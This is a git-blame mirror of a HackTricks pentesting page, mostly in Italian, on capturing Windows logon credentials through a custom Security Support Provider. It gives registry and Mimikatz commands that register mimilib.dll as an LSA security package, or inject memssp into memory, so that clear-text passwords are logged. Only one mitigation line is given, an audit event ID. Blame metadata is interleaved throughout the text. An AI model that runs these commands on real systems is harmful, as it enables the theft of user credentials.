Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

71 lines
3.7 KiB
Markdown
Raw Normal View History

GitBook: No commit message
2024-04-06 18:35:30 +00:00
# Custom SSP
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
<summary>Support HackTricks</summary>
GitBook: [#3560] No subject
2022-10-05 00:11:28 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
### Custom SSP
GitBook: [#3560] No subject
2022-10-05 00:11:28 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
Puoi creare il tuo **SSP** per **catturare** in **testo chiaro** le **credenziali** utilizzate per accedere alla macchina.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: No commit message
2024-04-06 18:35:30 +00:00
#### Mimilib
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
Puoi usare il file binario `mimilib.dll` fornito da Mimikatz. **Questo registrerà all'interno di un file tutte le credenziali in testo chiaro.**\
Posiziona il dll in `C:\Windows\System32\`\
Translated to Italian
2024-02-10 13:03:23 +00:00
Ottieni un elenco dei pacchetti di sicurezza LSA esistenti:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
{% code title="attacker@target" %}
```bash
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Translated to Italian
2024-02-10 13:03:23 +00:00
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
{% endcode %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
Aggiungi `mimilib.dll` alla lista dei fornitori di supporto per la sicurezza (Pacchetti di sicurezza):
a
2024-02-08 03:08:28 +00:00
```powershell
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
E dopo un riavvio, tutte le credenziali possono essere trovate in chiaro in `C:\Windows\System32\kiwissp.log`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: No commit message
2024-04-06 18:35:30 +00:00
#### In memoria
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
Puoi anche iniettare questo in memoria direttamente usando Mimikatz (nota che potrebbe essere un po' instabile/non funzionare):
a
2024-02-08 03:08:28 +00:00
```powershell
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
privilege::debug
misc::memssp
```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
Questo non sopravvivrà ai riavvii.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: No commit message
2024-04-06 18:35:30 +00:00
#### Mitigazione
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
ID evento 4657 - Audit creazione/modifica di `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
{% hint style="success" %}
Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
<details>
GitBook: [#3560] No subject
2022-10-05 00:11:28 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
<summary>Supporta HackTricks</summary>
GitBook: [#3560] No subject
2022-10-05 00:11:28 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:12:26 +00:00
{% endhint %}
Reference in a new issue Copy permalink